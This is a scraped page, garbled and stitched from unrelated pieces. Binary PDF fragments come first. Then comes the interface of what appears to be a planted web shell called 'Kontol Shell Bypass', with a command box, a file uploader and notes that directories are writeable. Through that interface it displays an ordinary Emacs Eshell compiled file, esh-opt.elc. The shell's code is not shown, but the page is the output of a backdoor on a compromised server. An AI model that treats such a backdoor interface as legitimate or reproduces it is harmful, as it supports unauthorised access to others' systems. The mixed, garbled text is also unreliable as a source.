%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/eshell/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/eshell/esh-opt.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2.1
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


(byte-code "\300\301!\210\302\303!\207" [provide esh-opt require esh-ext] 2)
#@2605 Process NAME's MACRO-ARGS using a set of command line OPTIONS.
After doing so, stores settings in local symbols as declared by OPTIONS;
then evaluates BODY-FORMS -- assuming all was OK.

OPTIONS is a list, beginning with one or more elements of the form:
(SHORT LONG VALUE SYMBOL HELP-STRING)
Each of these elements represents a particular command-line switch.

SHORT is either nil, or a character that can be used as a switch -SHORT.
LONG is either nil, or a string that can be used as a switch --LONG.
At least one of SHORT and LONG must be non-nil.
VALUE is the value associated with the option.  It can be either:
  t   - the option needs a value to be specified after the switch;
  nil - the option is given the value t;
  anything else - specifies the actual value for the option.
SYMBOL is either nil, or the name of the Lisp symbol that will be bound
to VALUE.  A nil SYMBOL calls `eshell-show-usage', and so is appropriate
for a "--help" type option.
HELP-STRING is a documentation string for the option.

Any remaining elements of OPTIONS are :KEYWORD arguments.  Some take
arguments, some do not.  The recognized :KEYWORDS are:

:external STRING
  STRING is an external command to run if there are unknown switches.

:usage STRING
  STRING is the initial part of the command's documentation string.
  It appears before the options are listed.

:post-usage STRING
  STRING is an optional trailing part of the command's documentation string.
  It appears after the options, but before the final part of the
  documentation about the associated external command (if there is one).

:show-usage
  If present, then show the usage message if the command is called with no
  arguments.

:preserve-args
  If present, do not pass MACRO-ARGS through `eshell-flatten-list'
and `eshell-stringify-list'.

For example, OPTIONS might look like:

   ((?C  nil         nil multi-column    "multi-column display")
    (nil "help"      nil nil             "show this usage display")
    (?r  "reverse"   nil reverse-list    "reverse order while sorting")
    :external "ls"
    :usage "[OPTION]... [FILE]...
  List information about the FILEs (the current directory by default).
  Sort entries alphabetically across.")

`eshell-eval-using-options' returns the value of the last form in
BODY-FORMS.  If instead an external command is run (because of
an unknown option), the tag `eshell-external' will be thrown with
the new process for its value.

Lastly, any remaining arguments will be available in a locally
interned variable `args' (created using a `let' form).

(fn NAME MACRO-ARGS OPTIONS &rest BODY-FORMS)
(defalias 'eshell-eval-using-options '(macro . #[899 "\300\301\302A@>\203\202\303\304DDD\305\306\307BBBD\310\311\312\313\314\315\nA@\"\"!\316\"BBBB\207" [let* temp-args :preserve-args eshell-stringify-list eshell-flatten-list processed-args eshell--do-opts (temp-args) append delete-dups delq nil mapcar #[257 "\211<\205\3008\205\3008\301B\207" [3 ((pop processed-args))] 3 "\n\n(fn OPT)"] ((args processed-args))] 14 (#$ . 489)]))
(put 'eshell-eval-using-options 'edebug-form-spec '(form form sexp body))
#@137 Helper function for `eshell-eval-using-options'.
This code doesn't really need to be macro expanded everywhere.

(fn NAME OPTIONS ARGS)
(defalias 'eshell--do-opts #[771 "\30020\3012%\211G\302U\203\303>\203\304\"\202$\305#\262\3060\211\205-\307\310\"\2620\211\203>\311\312\313\"\"\202?\207" [eshell-ext-command eshell-usage 0 :show-usage eshell-show-usage eshell--process-args nil error "%s" throw eshell-external eshell-external-command] 9 (#$ . 3626)])
#@71 Display the usage message for NAME, using OPTIONS.

(fn NAME OPTIONS)
(defalias 'eshell-show-usage #[514 "\300\301\302>A@#\303>\304>\305\203{@<\203t@\306\262\211@\203@\211A@\203@\300\307\300\310@A@#\3118#P\262\202s\211@\203W\300\307\300\312@\"\3118#P\262\202s\211A@\203p\300\307\300\313A@\"\3118#P\262\202s\305\262\210A\262\202\203\213\205\205\314A@Q\262\203\242\315A@!\262\203\242\316\317\"P\262\320\321\"\207" [format "usage: %s %s\n\n" :usage :external :post-usage nil t "    %-20s %s\n" "-%c, --%s" 4 "-%c" "    --%s" "\n" eshell-search-path format-message "\nThis command is implemented in Lisp.  If an unrecognized option is\npassed to this command, the external version `%s'\nwill be called instead." throw eshell-usage] 14 (#$ . 4108)])
#@190 Using NAME's remaining args (index AI), set the OPT within OPTIONS.
If the option consumes an argument for its value, the argument list
will be modified.

(fn NAME AI OPT OPTIONS OPT-VALS)
(defalias 'eshell--set-option #[1285 "\3018\204\302\"\207\3018\236\3038\304=\203DGV\203'\305\306\"\202K8\307V\203>S\233T\233\241\210\202KA\202K\3038\206K\304\241\207" [eshell--args 3 eshell-show-usage 2 t error "%s: missing option argument" 0] 10 (#$ . 4913)])
#@514 For NAME, process SWITCH (of type KIND), from args at index AI.
The SWITCH will be looked up in the set of OPTIONS.

SWITCH should be either a string or character.  KIND should be the
integer 0 if it's a character, or 1 if it's a string.

The SWITCH is then be matched against OPTIONS.  If no matching handler
is found, and an :external command is defined (and available), it will
be called; otherwise, an error will be triggered to say that the
switch is unrecognized.

(fn NAME SWITCH KIND AI OPTIONS OPT-VALS)
(defalias 'eshell--process-option #[1542 "\300\203;@<\2034@8\2034@8\232\2034\301@%\210\302\262\300\262\202A\262\202\211?\205m\303>\211\205k\304A@!\262\211\203Y\305\306\"\202k\307\310	!\203e\311\202f\312\n\n#\262\207" [nil eshell--set-option t :external eshell-search-path throw eshell-ext-command error characterp "%s: unrecognized option -%c" "%s: unrecognized option --%s"] 14 (#$ . 5400)])
#@63 Process the given ARGS using OPTIONS.

(fn NAME ARGS OPTIONS)
(defalias 'eshell--process-args #[771 "\301C\302\301\303\304\305\306\307\310!\311\"\312\313%\"\"\314\301GW\203\2478\262\211;\2033\315\316\"\204:T\262\202\317\320\"\317\321\"\314U\203PA\262\202\\S\233T	\233\241\210\203\200\211G\314V\203x\322	\320\n&\210\202\242G\262\202\242\211G\314\211W\203\240\322H\314	
\f&\210\211T\262\202\203\266\266\202\303\323\"\244)\207" [eshell--args nil delq mapcar make-byte-code 257 "\211<\205\3018\211\205\211\300\242>?\205\300\300\242B\240\210\211C\262\207" vconcat vector [3] 5 "\n\n(fn OPT)" 0 string-match "^-\\(-\\)?\\(.*\\)" match-string 1 2 eshell--process-option cdr] 18 (#$ . 6357)])

Kontol Shell Bypass